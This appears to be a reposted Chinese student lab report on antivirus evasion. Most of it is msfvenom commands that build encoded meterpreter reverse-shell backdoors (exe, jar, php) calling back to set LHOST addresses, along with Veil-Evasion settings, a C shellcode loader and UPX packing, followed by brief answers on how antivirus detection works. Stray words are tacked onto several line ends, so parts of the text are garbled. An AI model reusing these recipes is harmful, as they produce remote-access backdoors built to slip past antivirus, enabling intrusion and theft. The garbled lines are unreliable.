2018-2019-2 網絡對抗技術 20165237 Exp3 免殺原理與實踐

時間 2019-11-11

原文原文鏈接

1.1 正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，加殼工具，使用shellcode編程php
1.2 經過組合應用各類技術實現惡意代碼免殺java
1.3 用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本（由於Win10的自帶實時監控殺毒牆，一運行文件就自動刪除，因此沒有作這個加分項）linux

通常是對惡意軟件作處理，讓它不被殺毒軟件所檢測。也是滲透測試中須要使用到的技術。
要作好免殺，就時清楚殺毒軟件（惡意軟件檢測工具）是如何工做的。AV(Anti-virus)是很大一個產業。其中主要的技術人員基本有編制惡意軟件的經驗。shell

反過來也同樣，瞭解了免殺的工具和技術，你也就具備了反制它的基礎。編程

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikataga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.1 LPORT=5237 -f exe >fenix.exe

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.1 LPORT=5237 -f exe > met-encoded.exe

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.137.1 lport=5237 x> 20165237_backdoor_java.jar

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.153.135 lport=443 x> 20165237_backdoor.php

use evasion
use 7
set Lhost 192.168.153.135
set Lport 5237

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.135 LPORT=5237 -f c

unsigned char buf[] = 
此處省略。
int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

i686-w64-mingw32-g++ 20165237.c -o 20165237.exe

編譯這個.c文件爲可執行文件;

upx 20165237.exe -o 20165237plus.exe

一、殺軟是如何檢測出惡意代碼的？
答：基於特徵碼：殺軟會將惡意代碼中有明顯特徵的一部分做爲特徵碼，並創建起特徵庫，在檢測時則比對特徵碼是否匹配。
基於行爲：殺軟會監控運行的程序，像進行修改系統註冊表、啓動項等可疑操做的的程序就多是惡意代碼。
二、免殺是作什麼？
答：讓後門程序不被殺軟檢測出來
三、免殺的基本方法有哪些？
答：msfvenom直接生成、msfvenom屢次編碼、Veil-evasion、C+shellcode、UPX壓縮殼、Hyperion
感想：答：此次實驗讓我感覺到其實殺毒軟件只能殺很常規的病毒或者惡意程序，雖然病毒庫在持續更新，可是總會有未被查出的惡意軟件或者惡意代碼進入到本身的計算機，有一天破壞電腦數據。因此之後必定要注意安全上網，不要訪問非法網站或者點開非法鏈接，說不定點開就會致使惡意軟件的啓動，從而被盜取計算機中的信息！

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。